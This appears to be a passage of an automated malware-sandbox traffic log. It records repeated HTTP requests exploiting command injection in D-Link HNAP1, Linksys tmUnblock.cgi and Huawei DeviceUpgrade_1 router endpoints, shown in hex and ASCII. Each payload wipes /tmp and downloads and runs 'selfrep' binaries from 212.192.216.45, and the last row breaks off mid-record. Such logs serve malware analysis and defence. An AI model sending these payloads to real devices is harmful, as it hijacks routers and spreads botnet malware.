| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 